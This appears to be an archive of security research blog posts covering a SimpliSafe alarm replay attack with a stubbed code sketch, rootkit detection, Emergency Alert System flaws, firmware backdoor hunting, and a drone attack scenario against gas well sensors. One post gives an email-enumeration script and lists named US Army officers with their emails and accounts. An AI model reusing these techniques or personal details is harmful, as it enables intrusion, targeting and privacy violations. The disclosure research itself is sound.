RESEARCH | February 17, 2016

Remotely Disabling a Wireless Burglar Alarm

Countless movies feature hackers remotely turning off security systems in order to infiltrate buildings without being noticed. But how realistic are these depictions? Time to find out.
 
Today we’re releasing information on a critical security vulnerability in a wireless home security system from SimpliSafe. This system consists of two core components, a keypad and a base station. These may be combined with a wide array of sensors, ranging from smoke detectors to magnet switches to motion detectors, to create a complete home security system. The system is marketed as a cost-effective and DIY-friendly alternative to wired systems that require expensive professional installation and long-term monitoring service contracts.
     
Looking at the FCC documentation for the system provides a few hints. It appears the keypad and sensors transmit data to the base station using on-off keying in the 433 MHz ISM band. The base station replies using the same modulation at 315 MHz.
 
After dismantling a few devices and looking at which radio(s) were installed on the boards, I confirmed the system is built around a star topology: sensors report to the base station, which maintains all system state data. The keypad receives notifications of events from the base station and drives the LCD and buzzer as needed; it then sends commands back to the base station. Sensors only have transmitters and therefore cannot receive messages.
 
Rather than waste time setting up an SDR or building custom hardware to mess with the radio protocol, I decided to “cheat” and use the conveniently placed test points found on all of the boards. Among other things, the test points provided easy access to the raw baseband data between the MCU and RF upconverter circuit.
 
I then worked to reverse engineer the protocol using a logic analyzer. Although I still haven’t figured out a few bits at the application layer, the link-layer framing was pretty straightforward. This revealed something very interesting: when messages were sent multiple times, the contents (except for a few bits that seem to be some kind of sequence number) were identical! This means the messages are either sent in cleartext or encrypted with a cipher that uses no nonces or salts.
 
After a bit more reversing, I was able to find a few bits that reliably distinguished a “PIN entered” packet from any other kind of packet.
 
I spent quite a while trying to figure out how to convert the captured data bytes back to the actual PIN (in this case 0x55 0x57 -> 2-2-2-2) but was not successful. Luckily for me, I didn’t need that for a replay attack.
 
To implement the actual attack I simply disconnected the MCUs from the base station and keypad, and soldered wires from the TX and RX basebands to a random microcontroller board I had sitting around the lab. A few hundred lines of C later, I had a device that would passively listen to incoming 433 MHz radio traffic until it saw a SimpliSafe “PIN entered” packet, which it recorded in RAM. It then lit up an LED to indicate that a PIN had been recorded and was ready to play back. I could then press a button at any point and play back the same packet to disarm the targeted alarm system.
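
For illustration, here is a heavily simplified sketch of that record-and-replay loop, written in Python for readability (the real device was a few hundred lines of C on a microcontroller). Every helper here (the baseband I/O, the LED and button routines, the frame length, and the “PIN entered” marker bits) is a hypothetical stand-in, not the real SimpliSafe framing:

# Record-and-replay sketch; all hardware and protocol specifics are stubs.
FRAME_BITS = 112                      # placeholder frame length

def read_frame(read_bit):
    # Collect one link-layer frame worth of demodulated baseband bits.
    return [read_bit() for _ in range(FRAME_BITS)]

def is_pin_packet(frame):
    # Stand-in for the few bits that reliably mark a "PIN entered" packet.
    return frame[:8] == [1, 0, 1, 0, 1, 0, 1, 0]

def run(read_bit, transmit_bits, set_led, button_pressed):
    recorded = None
    while True:
        if recorded is None:
            frame = read_frame(read_bit)
            if is_pin_packet(frame):
                recorded = frame      # keep the PIN packet in RAM
                set_led(True)         # signal "ready to replay"
        elif button_pressed():
            transmit_bits(recorded)   # replay verbatim; no nonce prevents it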
 
This attack is very inexpensive to implement – it requires a one-time investment of about $250 for a commodity microcontroller board, SimpliSafe keypad, and SimpliSafe base station to build the attack device. The attacker can hide the device anywhere within about a hundred feet of the target’s keypad until the alarm is disarmed once and the code recorded. Then the attacker retrieves the device. The code can then be played back at any time to disable the alarm and enable an undetected burglary, or worse.
 
While I have not tested this, I expect that other SimpliSafe sensors (such as entry sensors) can be spoofed in the same fashion. This could allow an attacker to trigger false/nuisance alarms on demand.
 
Unfortunately, there is no easy workaround for the issue since the keypad happily sends unencrypted PINs out to anyone listening. Normally, the vendor would fix the vulnerability in a new firmware version by adding cryptography to the protocol. However, this is not an option for the affected SimpliSafe products because the microcontrollers in currently shipped hardware are one-time programmable. This means that field upgrades of existing systems are not possible; all existing keypads and base stations will need to be replaced.
 
IOActive made attempts through multiple channels to contact SimpliSafe upon finding this critical vulnerability, but received no response from the vendor. IOActive also notified CERT of the vulnerability in the normal course of responsible disclosure. The timeline can be found here within the release advisory. 
 
SimpliSafe claims to have its units installed in over 300,000 homes in North America. Consumers of this product need to know that it is inherently insecure and vulnerable to even a low-level attacker. This simple vulnerability is particularly alarming because: 1) it exists within a “security product” that is trusted to secure over a million homes; 2) it enables an attacker to completely own the system (i.e., disable it, change PIN codes, etc.); and 3) many unsuspecting consumers prominently display window and yard signs promoting their use of this system…essentially self-identifying their home as a viable target for an attacker. 
 
RESEARCH | September 10, 2014

Killing the Rootkit

Cross-platform, cross-architecture DKOM detection

To know if your system is compromised, you need to find everything that could run or otherwise change state on your system and verify its integrity (that is, check that the state is what you expect it to be).

“Finding everything” is a bold statement, particularly in the realm of computer security, rootkits, and advanced threats. Is it possible to find everything? Sadly, the short answer is no, it’s not. Strangely, the long answer is yes, it is.

By defining the execution environment at any point in time, predominantly through the use of hardware-based hypervisor or virtualization facilities, you can verify the integrity of that specific environment using cryptographically secure hashing.

Despite the relative ease of hash integrity checks, applying them to memory presents a number of significant challenges, the most difficult being identifying all of the processes that may execute on a system. Each process’s control register (CR3) describes its virtual-to-physical memory layout. Only after all processes are found can integrity verification of code and data, along with static/structural analysis, be conducted.

“DKOM is one of the methods commonly used and implemented by Rootkits, in order to remain undetected, since this the main purpose of a rootkit.” – Harry Miller

Detecting DKOM-based processes has largely been conducted at the logical layer (see the seven different techniques https://code.google.com/p/volatility/wiki/CommandReference#psxview). This is prone to failure and iterative evasion since most process detection techniques are based on recognizing OS artifacts.
Finding Processes by Page Table Detection
When an OS starts up a process, it establishes the ability for virtual memory to be used (to enable memory protection) by creating a page table. The page table is itself a single page of physical memory (0x1000 bytes). It is usually allocated by way of a cache-optimized mechanism, which makes locating it somewhat complicated. Fortunately, we can identify a page table by understanding several established (hardware) requirements for its construction.

Even if an attacker significantly modifies and attempts to hide from standard logical object scanning, there is no way to evade page-table detection without significantly patching the OS fault handler. A major benefit of a DKOM rootkit is that it avoids code patches; that level of modification is easily detected by integrity checks and is counter to the goal of DKOM. DKOM is a codeless rootkit technique: it runs code without patching the OS to hide itself, and it only patches data pointers.

IOActive released several versions of this process detection technique. We also built it into our memory integrity checking tools, BlockWatch™ and The Memory Cruncher™.

Process-based Page Table Detection
Any given page of memory could be a page table. Typically a page table is organized as a series of page table entries (PTEs). These entries are usually traversed by selecting some bits from a virtual address and converting them into a series of table lookups.

The magic of this technique comes from the propensity of all OSs (at least Windows, Linux, and BSD) to map their page tables into virtual memory, so that they can edit PTEs through virtual addresses instead of physical memory addresses.

By reserving one entry at a fixed offset of the top-level table and pointing it back at the table’s own physical base (the CR3 value), the page table can essentially be accessed through a special virtual address (the self map). Refer to the Linux article for an exhaustive explanation of why this is useful.
Physical Memory Page 
 
If we examine any given page of physical memory, we can check a few known offsets for valid PTEs. Windows has proven to consume, for every process, entry 0, entry 0x1ED (the self map), and a couple of additional kernel regions (consistent across all Win64 versions).
PTE Format
 
typedef struct _HARDWARE_PTE {
    ULONGLONG Valid : 1;             // Indicates hardware or software handling (Mode 1 and 2)
    ULONGLONG Write : 1;
    ULONGLONG Owner : 1;
    ULONGLONG WriteThrough : 1;
    ULONGLONG CacheDisable : 1;
    ULONGLONG Accessed : 1;
    ULONGLONG Dirty : 1;
    ULONGLONG LargePage : 1;         // Mode 2
    ULONGLONG Global : 1;
    ULONGLONG CopyOnWrite : 1;
    ULONGLONG Prototype : 1;         // Mode 2
    ULONGLONG reserved0 : 1;
    ULONGLONG PageFrameNumber : 36;  // PFN, always incrementing (Mode 1 and 2)
    ULONGLONG reserved1 : 4;
    ULONGLONG SoftwareWsIndex : 11;  // Mode 2
    ULONGLONG NoExecute : 1;
} HARDWARE_PTE, *PHARDWARE_PTE;
By checking the physical memory offsets we expect and extracting the candidate entries, we can determine whether a physical page is a valid page table. There are also a number of properties we understand about physical memory: the page frame number (PFN) will always increase relative to earlier pages and will not be larger than the current linear position plus the memory gap ranges.
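
As a rough illustration of the self-map check, the following sketch scans a raw physical memory image for candidate Win64 top-level page tables: entry 0 and entry 0x1ED must be valid, and the self-map entry’s PFN must point back at the candidate page itself. The dump-handling details are assumptions, and a real scanner also applies the PFN sanity rules above:

import struct

PAGE = 0x1000
SELF_MAP = 0x1ED                      # Win64 self-map slot, per the text above
PFN_MASK = ((1 << 36) - 1) << 12      # bits 12..47 hold the page frame number

def find_candidate_page_tables(dump_path):
    # Yield physical addresses of pages that look like self-mapped top-level tables.
    with open(dump_path, "rb") as f:
        page_no = 0
        while True:
            page = f.read(PAGE)
            if len(page) < PAGE:
                break
            entry0 = struct.unpack_from("<Q", page, 0)[0]
            self_e = struct.unpack_from("<Q", page, SELF_MAP * 8)[0]
            both_valid = (entry0 & 1) and (self_e & 1)       # Valid bits set
            self_ref = ((self_e & PFN_MASK) >> 12) == page_no  # points to itself
            if both_valid and self_ref:
                yield page_no * PAGE
            page_no += 1
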
What About Shadow Walker Tricks?
 
Shadow Walker abuses the nature of the TLB of a running system: execution may occur at a different address than reading. If you look/scan/check memory, reads are cloaked to return what you expect, while execution actually occurs somewhere different.
This is one reason why we analyze memory extracted from a hypervisor “guest” OS snapshot. Analyzing memory from behind a hypervisor establishes a “semantic gap” that ensures our static memory analysis includes all possible memory pages, unaffected by split I/D TLB games.
What About Hardware Rootkits?
 
Using a hypervisor makes verifying device memory easy. Verification at the host or physical layer is extremely complicated. Different hardware vendors have vastly different ways to extract and interact with firmware; UEFI may be verifiable with MITRE’s Copernicus2 or other tools.
In order for a hypervisor to be affected by a hardware rootkit, the hypervisor has to have been “escaped”, which is currently a rare and valuable exploit. It is probably not worth risking such a valuable exploit for a hardware rootkit that can be mitigated by the network. Extracting physical system memory in a consistent way (immune to attack and evasion) has historically been very hard.
If you are concerned about hardware rootkits, there are some extreme techniques that may help.
IOActive has Everything
 
Now that we have established a method for finding everything, the next task is relatively simple: do some checking to ensure that what we found is what we expected. Using cryptographically secure hash checks in a whitelist fashion is a straightforward and hard-to-attack technique for integrity verification.
IOActive’s current solution, BlockWatch™, does just that. It manages memory extraction and hash checking that testifies to what we have found.
Weird Rootkits
I classify “weird rootkits” as anything from a ROP-based rootkit to some form of script injection or anything else where the attacker can coerce an application to behave in an unexpected (and rootkit-like) way.
Detecting ROP is actually quite easy (stack checking a memory snapshot); I covered some of this in a CanSecWest presentation I gave earlier this year. Each return address on a stack must be preceded by a call instruction. You can then validate that the call opcode exists and that the return address is not spurious (as it is for a ROP attack). ROP stacks are also exceedingly large and atypical of normal threads.
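
A minimal version of the return-address check, using the Capstone disassembler and assuming a read_mem helper that reads pages out of the memory snapshot, might look like this (x86-64 call encodings vary in length, so we try each plausible length):

from capstone import Cs, CS_ARCH_X86, CS_MODE_64

md = Cs(CS_ARCH_X86, CS_MODE_64)

def preceded_by_call(read_mem, ret_addr, max_len=8):
    # True if some single call instruction ends exactly at ret_addr.
    # read_mem(addr, size) -> bytes or None is an assumed snapshot reader.
    for length in range(2, max_len + 1):
        code = read_mem(ret_addr - length, length)
        if code is None:
            continue                  # page absent from the snapshot
        insns = list(md.disasm(code, ret_addr - length))
        if len(insns) == 1 and insns[0].mnemonic == "call":
            return True
    return False

Walking every saved return address on a thread’s stack through a check like this flags ROP frames: spurious return addresses fail the test, and an abnormally deep stack of failures is the giveaway.
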
What about other attacks, rootkits implemented in server scripts and anything else? If we have found the address spaces for all of the processes and are able to validate the integrity of all of the kernel code, then any scripts or weird rootkits will be observable through normal profiling and logging interfaces.
Summary
 
By leveraging the unique ability of a hypervisor to expose the physical memory of a system in a way that is consistent (not modified by an attacker), we can use a high-assurance process detection technique combined with integrity checking to detect any rootkit.

Shane Macaulay

Additional References
  • BlockWatch™
  • DEF CON 22 Presentation: “Weird-machine Motivated Practical Page Table Shellcode & Finding Out What’s Running on Your System”
  • PMODUMP
  • Windows Debugging Blog on understanding !PTE
INSIGHTS | December 4, 2013

Practical and cheap cyberwar (cyber-warfare): Part II

Disclaimer: I did not perform any illegal attacks on the mentioned websites in order to get the information I present here. No vulnerability was exploited on the websites, and they are not known to be vulnerable.
 
Given that we live in an age of information leakage where government surveillance and espionage abound, I decided in this second part to focus on a simple technique for information gathering on human targets. If an attacker is targeting a specific country, members of the military and defense contractors would make good human targets. When targeting members of the military, an attacker would probably focus on high-ranking officers; for defense contractors, an attacker would focus on key decision makers, C-level executives, etc. Why? Because if an attacker compromises these people, they could gain access to valuable information related to their work, their personal life, and family. Data related to their work could help an attacker strategically by enabling them to build better defenses, steal intellectual property, and craft specific attacks. Data related to a target’s personal life could help attackers blackmail the target or attack the target’s family.
 
 
There is no need to work for the NSA and have a huge budget in order to get juicy information. Everything is just one click away; attackers only need to find ways to easily milk the web. One easy way to gather information about people is to get their email addresses, as I described last year here: http://blog.ioactive.com/2012/08/the-leaky-web-owning-your-favorite-ceos.html. Basically, you use a website registration form and/or forgotten-password functionality to find out whether an email address is already registered on a website. With a list of email addresses, attackers can easily enumerate the websites/services where people have accounts. Given the ever-increasing number of online accounts one person usually has, this could provide a lot of useful information. For instance, it could make phishing attacks and social engineering easier (see http://www.infosecurity-magazine.com/view/35048/hackers-target-mandiant-ceo-via-limo-service/). Also, if one of the sites where the target has an account is vulnerable, that website could be hacked to obtain the target’s account password. Due to password reuse, attackers can often compromise all of the target’s accounts.
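
The technique needs nothing more than a handful of HTTP requests per address. Here is a minimal sketch; the endpoint URL, form field, and “not found” marker below are hypothetical placeholders, and each real site needs its own entry:

import requests

# Hypothetical per-site database: reset endpoint, form field, and the
# response marker that means "no account with that address".
SITES = {
    "example-site.com": ("https://example-site.com/forgot-password",
                         "email", "no account found"),
}

def has_account(email, site):
    url, field, not_found = SITES[site]
    r = requests.post(url, data={field: email}, timeout=10)
    return not_found not in r.text.lower()

for email in ("john.doe@us.army.mil",):
    for site in SITES:
        if has_account(email, site):
            print(email, "has an account on", site)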
 
 
This is intended to be easy and practical, so let’s get hands on. I did this research about a year ago. First, I looked for US Army email addresses. After some Google.com searches, I ended up with some PDF files with a lot of information about military people and defense contractors:

I extracted some emails and made a list. I ended up with:
 
1784 total email addresses: military (active and retired), civilians, and defense contractors.
 
I could have gotten more email addresses, but that was enough for testing purposes. I wasn’t planning on doing a real attack.
 
I had a very simple (about 50 LoC or so) Python tool (thanks to my colleague Ariel Sanchez for quickly building the original tool!) that can be fed a list of websites and email addresses. I had already built the website database with 20 or so common and well-known websites (I should have used military-related ones too for better results, but it still worked well). I loaded the list of email addresses I had found and ran the tool. A few minutes later I ended up with a long list of email addresses and the websites where those email addresses were used (meaning where the owners of those email addresses have accounts):
 
Site                          Accounts       %
Facebook                        308       17.26457
Google                          229       12.83632
Orbitz                          182       10.20179
WashingtonPost                  149        8.352018
Twitter                         108        6.053812
Plaxo                            93        5.213004
LinkedIn                         65        3.643498
Garmin                           45        2.522422
MySpace                          44        2.466368
Dropbox                          44        2.466368
NYTimes                          36        2.017937
NikePlus                         23        1.289238
Skype                            16        0.896861
Hulu                             13        0.7287
Economist                        11        0.616592
Sony Entertainment Network        9        0.504484
Ask                               3        0.168161
Gartner                           3        0.168161
Travelers                         2        0.112108
Naymz                             2        0.112108
Posterous                         1        0.056054
 
Interesting to find accounts on the Sony Entertainment Network website; who says the military can’t play PlayStation 🙂
 
I decided that I should focus on something juicier, not just random .mil email addresses. So, I did a little research about high ranking US Army officers, and as usual, Google and Wikipedia ended up being very useful.
 
Let’s start with US Army Generals. Since this was done in 2012, some of them could be retired now.

 
I found some retired ones that now may be working for defense contractors and trusted advisors:

 
Active US Army Generals seem not to use their .mil email addresses on common websites; however, we can see a pattern: almost all of them use orbitz.com. For the retired ones, since we got their personal (not .mil) email addresses, we can see they use them on many websites.

After US Army Generals, I looked at Lieutenant Generals (we could say future Generals):

Maybe because they are younger, they seem to use their .mil email addresses on several common websites, including Facebook.com. Even more, most of their Facebook information is available to the public! I thought about publishing the related Facebook information, but I will leave it up to you to explore their Facebook profiles.
 
I also looked for US Army Major Generals and found at least 15 of them:
 
Robert Abrams
Email: robert.abrams@us.army.mil
Found account on site: orbitz.com
Found account on site: washingtonpost.com

James Boozer
Email: james.boozer@us.army.mil
Found account on site: orbitz.com
Found account on site: facebook.com

Vincent Brooks
Email: vincent.brooks@us.army.mil
Found account on site: facebook.com
Found account on site: linkedin.com

James Eggleton
Email: james.eggleton@us.army.mil
Found account on site: plaxo.com

Reuben Jones
Email: reuben.jones@us.army.mil
Found account on site: plaxo.com
Found account on site: washingtonpost.com

David Quantock
Email: david-quantock@us.army.mil
Found account on site: twitter.com
Found account on site: orbitz.com
Found account on site: plaxo.com

Dave Halverson
Email: dave.halverson@conus.army.mil
Found account on site: linkedin.com

Jo Bourque
Email: jo.bourque@us.army.mil
Found account on site: washingtonpost.com

Kev Leonard
Email: kev-leonard@us.army.mil
Found account on site: facebook.com

James Rogers
Email: james.rogers@us.army.mil
Found account on site: plaxo.com

William Crosby
Email: william.crosby@us.army.mil
Found account on site: linkedin.com

Anthony Cucolo
Email: anthony.cucolo@us.army.mil
Found account on site: twitter.com
Found account on site: orbitz.com
Found account on site: skype.com
Found account on site: plaxo.com
Found account on site: washingtonpost.com
Found account on site: linkedin.com

Genaro Dellarocco
Email: genaro.dellarocco@msl.army.mil
Found account on site: linkedin.com

Stephen Lanza
Email: stephen.lanza@us.army.mil
Found account on site: skype.com
Found account on site: plaxo.com
Found account on site: nytimes.com

Kurt Stein
Email: kurt-stein@us.army.mil
Found account on site: orbitz.com
Found account on site: skype.com
 
Later I found about 7 US Army Brigadier General and 120 US Army Colonel email addresses, but I didn’t have time to properly filter the results. These email addresses were associated with many website accounts.
 
Basically, the 1784 total email addresses included a broad list of ranking officers from the US Army.
 
Doing a quick analysis of the gathered information we could infer: 
  • Many have Facebook accounts exposing to the public the family and friend relations that could be targeted by attackers. 
  • Most of them read and are probably subscribed to The Washington Post (makes sense, no?). This could be an interesting avenue for attacks such as phishing and watering hole attacks. 
  • Many of them use orbitz.com, probably for car rentals. Hacking this site could give attackers a lot of information about how they move, when they travel, etc. 
  • Many of them have accounts on google.com, probably meaning they have Android devices (smartphones, tablets, etc.). This could allow attackers to compromise the devices remotely (by email, for instance) with known or 0-day exploits, since these devices are not usually patched and not very secure.
  • And last but not least, many of them, including Generals, use garmin.com or nikeplus.com. Those websites are related to GPS devices, including running watches, and they allow users to upload GPS information, making them very valuable to attackers for tracking purposes. They could learn the area where a person usually runs, where they travel, etc.

As we can see, it’s very cheap and easy to get information about ranking members of the US Army. People serving in the US Army should take extra precautions. They should not make their email addresses public and should only use them for “business” related issues, not personal activities.
INSIGHTS | November 11, 2013

Practical and cheap cyberwar (cyber-warfare): Part I

Every day we hear about a new vulnerability or a new attack technique, but most of the time it’s difficult to imagine the real impact. The current emphasis on cyberwar (cyber-warfare if you prefer) leads to myths and nonsense being discussed. I wanted to show real life examples of large scale attacks with big impacts on critical infrastructure, people, companies, etc.
 

The idea of this post is to raise awareness. I want to show how vulnerable some industrial, oil, and gas installations currently are and how easy it is to attack them. Another goal is to pressure vendors to produce more secure devices and to speed up the patching process once vulnerabilities are reported.


The attack in this post is based on research done by my fellow pirates, Lucas Apa and Carlos Penagos. They found critical vulnerabilities in wireless industrial control devices. This research was first presented at BH USA 2013. You can find their full presentation here https://www.blackhat.com/us-13/archives.html#Apa
 
A common information leak occurs when vendors highlight how they helped Company X with their services or products. This information is very useful for supply chain attacks. If you are targeting Company X, it’s good to look at their service and product providers. It’s also useful to know what software/devices/technology they use.

In this case, one of the vendors that sells vulnerable wireless industrial control devices is happy to announce in a press release that Company X has acquired its wireless sensors and is using them in the Haynesville Shale fields. So, as an attacker, we now know that Company X is using vulnerable wireless sensors at the Haynesville Shale fields. Haynesville Shale fields, what’s that? Interesting, with a quick Google search you end up with:
 
How does Google know about shale well locations? It’s simple: publicly available information. You can display wells by name, organization, etc.:
 
Even interactive maps are available:
 
You can find all of Company X’s wells along with their exact location (geographical coordinates). You know almost exactly where the vulnerable wireless sensors are installed.
 
Since the wells are at a remote location, exploiting the wireless sensor vulnerabilities becomes an interesting challenge. Enter drones: unmanned aerial vehicles (UAVs). Commercially available drones range from a couple hundred dollars to tens of thousands of dollars, depending on range, endurance, functionality, etc. You can even build your own and save some money. The idea is to put the attack payload in a drone, send it to the wells’ location, and launch the attack. This isn’t difficult to do since drones can be programmed to fly to x,y coordinates and execute the payload while flying around the target coordinates (no need to return). 
 
Depending on your budget, you can launch an attack from a nearby location or very far away. Depending on the drone’s endurance, you can be X miles away from the target. You can extend the drone’s range depending on the radio and antenna used. 
 
The types of exploits you could launch from the drone range from bricking all of the wireless devices to causing physical harm to the shale gas installations. Manipulating device firmware or injecting fake data into radio packets could make the control systems believe things like the temperature or pressure are wrong. Just bricking the devices could cost Company X significant money, since the devices would need to be reconfigured/reflashed. The exploits could interfere with shale gas extraction and even halt production. The consequences of an attack could be even more catastrophic depending on how the vulnerable devices are being used.
 
Attacks could be expanded to target more than just one vendor’s device. Drones could do reconnaissance first, scan and identify devices from different vendors, and then launch attacks targeting all of the specific devices.
 
In order to highlight attack possibilities and impact consequences I extracted the following from http://www.onworld.com/news/newsoilandgas.html (the companies mentioned in this article are not necessarily vulnerable, this is just for illustrative purposes):
 
“…Pipelines & Corrosion Monitoring
Wireless flow, pressure, level, temperature and valve position monitoring are used to streamline pipeline operation and storage while increasing safety and regulatory compliance. In addition, wireless sensing solutions are targeted at the billions of dollars per year that is spent managing pipeline corrosion. While corrosion is a growing problem for the aging pipeline infrastructure it can also lead to leaks, emissions and even deadly explosions in production facilities and refineries….”
 
Leaks and deadly explosions can have sad consequences.
 
Cyber criminals, terrorists, state actors, etc. can launch big-impact attacks with relatively small budgets. Their attacks could produce economic losses, physical damage, and even possible explosions.
 
While isolated attacks have a small impact when put in the context of cyberwar, they can cause panic in populations, political crisis, or geopolitical problems if combined with other larger impact attacks.
In a future post I will probably describe more of these kinds of large-scale, big-impact attacks.
INSIGHTS | October 17, 2013

Strike Two for the Emergency Alerting System and Vendor Openness

Back in July I posted a rant about my experiences reporting the DASDEC issues and the problems I had getting things fixed. Some months have passed and I thought it would be a good time to take a look at how the vulnerable systems have progressed since then.

Well, back then my biggest complaint was the lack of forthrightness in Monroe Electronics’ public reporting of the issues; they were treated as a marketing problem rather than a security one. The end result (at the time) was that there were more vulnerable systems available on the internet – not fewer – even though many of the deployed appliances had adopted the 2.0-2 patch.

What I didn’t know at the time was that the 2.0-2 patch wasn’t as effective as one would have hoped; in most cases bad and predictable credentials were left in place intentionally, as in I was informed that Monroe Electronics was “intentionally not removing the exposed key(s) out of concern for breaking things.”

In addition to not removing the exposed keys, it didn’t appear that anyone even tried to review or audit any other aspect of the DASDEC security before pushing the update out. If someone told you that you had a shared SSH key for root, you might say… check that the root password isn’t the same for every box too, right? Yeah… you’d think so, wouldn’t you!

After discovering that most of the “patched” servers running 2.0-2 were still vulnerable to the exposed SSH key, I decided to dig deeper into the newly issued security patch and discovered another series of flaws which exposed more credentials (allowing unauthenticated alerts) along with a mixed bag of predictable and hardcoded keys and passwords. Oh, and there are web-accessible backups containing credentials.

Even new features introduced to the 2.0-2 version since I first looked at the technology appeared to contain a new batch of hardcoded (in their configuration) credentials.

Upon our last contact with CERT we were informed that ‘[t]hese findings are entering the realms of “not terribly serious” and “not something the vendor can practically do much about.”‘

Go team cyber-security!

So… on one hand we’ve had one zombie alert and a good handful of responsibly disclosed issues which began back in January 2013… on the other hand I’m not sure anything changed except for a few default passwords and some version numbers.

Let’s not forget that the EAS is a critical national infrastructure component designed to save lives in an emergency. Ten months on and the entire system appears more vulnerable than when we began pointing out the vulnerabilities.
INSIGHTS | July 11, 2013

Why Vendor Openness Still Matters

When the zombies began rising from their graves in Montana it had already been over 30 days since IOActive had reported issues with Monroe Electronics DASDECs.
 
And while it turned out in the end that the actual attacks which caused the false EAS messages to be transmitted relied on the default password never having been changed, this would have been the ideal point to publicize that there was a known issue and that a firmware update was available, or soon would be, to address this and other problems… maybe a mitigation or two in the meantime, right?

At a minimum it would have been an ideal time to provide the simple mitigation:
“rm ~/.ssh/authorized_keys”
 
Unfortunately this never happened, leading to a phenomenon I like to call “admin droop”. This is where an administrator, after discovering the details of a published vulnerability, decides he’s not vulnerable because he doesn’t run the default configuration, sees that everything is working, and doesn’t bother to upgrade to the next version.
 
… it happens…
 
In the absence of reliable information, other outlets such as the FCC provided pretty minimal advice about changing passwords and using firewalls; I simply commented to the media that this was “inadequate” advice.
 
Eventually, somewhere around April 24, Monroe, with the assistance of CERT, began contacting customers about a firmware fix; we provided a Shodan XML file with a few hundred vulnerable hosts to help track them down. Finally it looked like things were getting fixed, but I was somewhat upset that I still had not seen official acknowledgement of the issue from Monroe. On June 13 Monroe finally published this /wp-content/uploads/2013/07/130604-Monroe-Security-PR.pdf security advisory, which stated “Removal of default SSH keys and a simplified user option to load new SSH keys”. OK, it’s not much of an “announcement”, but it’s something. And I know it says April 24, but both the filename and metadata (pdfinfo) point to (cough) later origins…
 
Inside the advisory is this wonderful sentence: “The company notes that most of its users already have obtained this update.” That sounds like something worth testing!
 
Then it happened, before I could say “admin droop”… 
 
Found/vulnerable hosts before we reported the issue: 222
Found hosts after the patch was released, as found by a survey on July 11: 412
 
Version            Hosts Found    Vulnerable (SSH key)
1.8-5a                   1                Yes
1.8-6                    2                Yes
2.0-0                  110                Yes
2.0-0_a01                1                Yes
2.0-1                   68                Yes
2.0-2 (patched)         50                No
unreachable            180

While most users may have “obtained” the update, someone certainly didn’t bother applying it…
 
Yep… it’s worse now than it was before we reported the issue in January, and everyone thinks everything is just fine. I’m sure some of this would still be a problem had a proper security notice been issued, but it’s hard to believe it would be this bad.
 
I can’t say it any better than these awesome folks over at Google http://googleonlinesecurity.blogspot.com/2013/05/disclosure-timeline-for-vulnerabilities.html : “Our standing recommendation is that companies should fix critical vulnerabilities within 60 days — or, if a fix is not possible, they should notify the public about the risk and offer workarounds.”

INSIGHTS | May 23, 2013

Identify Backdoors in Firmware By Using Automatic String Analysis

The Industrial Control Systems Cyber Emergency Response Team (ICS-CERT) this Friday published an advisory about some backdoors I found in two programmable gateways from TURCK, a leading German manufacturer of industrial automation products.
Using hard-coded account credentials in industrial devices is a bad idea. I can understand the temptation among manufacturers to include a backdoor “support” mechanism in the firmware for a product such as this. This backdoor allows them to troubleshoot problems remotely with minimal inconvenience to the customer.

On the other hand, it is only a matter of time before somebody discovers these ‘secret’ backdoors. In many cases, it takes very little time.

The TURCK backdoor is similar to other backdoors that I discussed at Black Hat and in previous blog posts. The common denominator is this: you do not need physical access to an actual device to find its backdoor. All you have to do is download device firmware from the vendor’s website. Once you download the firmware, you can reverse engineer it and learn some interesting secrets.
For example, consider the TURCK firmware. The binary file contains a small header, which simplifies the reverse engineering process:

The offset 0x1c identifies the base address. Directly after the header are the ARM opcodes. This is all the information you need to load the firmware into an IDA disassembler and debugger.
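
Extracting that load information is a one-liner once you know the header layout. In the sketch below, the little-endian read and the assumption that the ARM opcodes start right at 0x20 are mine, so adjust them to the actual header:

import struct

def turck_load_info(firmware_path):
    # Read the base (load) address from the small firmware header.
    with open(firmware_path, "rb") as f:
        header = f.read(0x20)
    base = struct.unpack_from("<I", header, 0x1C)[0]  # offset 0x1c: base address
    return base, 0x20   # load address for IDA, assumed offset of first opcode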

A brief review revealed that the device has its own FTP server, among other services. I also discovered several hard-coded credentials that are added when the system starts. Together, the FTP server and hard-coded credentials are a dangerous combination. An attacker with those credentials can completely compromise this device.
Find Hidden Credentials Fast
You can find hidden credentials such as this using manual analysis. But I have a method to discover hidden credentials more quickly. It all started during a discussion with friends at the LaCon conference regarding these kinds of flaws. One friend (hello @p0f ! ) made an obvious but interesting comment: “You could just find these backdoors by running the ‘strings’ command on the firmware file, couldn’t you?”

This simple observation is correct. All of the backdoors that are already public (such as Schneider, Siemens, and TURCK) could have been identified by looking at the strings … if you know common IT/embedded syntax. You still have to verify that potential backdoors are valid. But you can definitely identify suspicious elements in the strings.
There is a drawback to this basic approach. Firmware usually contains thousands of strings and it can take a lot of time to sift through them. It can be much more time consuming than simply loading the firmware in IDA, reconstructing symbols, and finding the ‘interesting’ functions.
So how can one collect intelligence from strings in less time? The answer is an analysis tool we created and use at IOActive called Stringfighter.
How Does Stringfighter Work?
Imagine dumping strings from a random piece of firmware. You end up with the following list of strings:
[Creating socket]
ERROR: %n
Initializing 
Decompressing kernel
GetSrvAddressById
NO_ADDRESS_FOUND
Xi$11ksMu8!Lma

From your security experience you notice that the last string seems different from the others—it looks like a password rather than a valid English word or a symbol name. I wanted to automate this kind of reasoning.
This is not code analysis. We only assume certain common patterns (such as sequential strings and symbol tables) usually found in this kind of binary. We also assume that compilers under certain circumstances put strings close to their references.
As in every decision process, the first step is to filter input based on selected features. In this case we want to discover ‘isolated’ strings. By ‘isolated’ I’m referring to ‘out-of-context’ elements that do not seem related to other elements.
An effective algorithm known as the ‘Levenshtein distance’ is frequently used to measure string similarity.
To apply this algorithm we create a window of n bytes that scans for ‘isolated’ strings. Inside that window, each string is checked against its ‘neighbors’ based on several metrics including, but not limited to, the Levenshtein distance.
However, this approach poses some problems. After removing blocks of ‘related strings,’ some potentially isolated strings are false positive results. For example, an ‘isolated’ string may be related to a distant ‘neighbor.’
We therefore need to identify additional blocks of ‘related strings’ (especially those belonging to symbol tables) formed between distant blocks that later become adjacent.
To address this issue we build a ‘first-letter’ map and run this until we can no longer remove additional strings.
At this point we should have a number of strings that are not related. However, how can we decide whether the string is a password? I assume developers use secure passwords, so we have to find strings that do not look like natural words.
We can consider each string as a first-order Markov source. To do this, use the following formula to calculate its entropy rate:
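(For a first-order Markov source with transition probabilities Pij and stationary distribution μi, the standard entropy rate is H = −Σi μi Σj Pij log2 Pij; here the states are characters and the transition matrix is estimated from a dictionary.)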
We need a large dictionary of English (or any other language) words to build a transition matrix. We also need a black list to eliminate common patterns.
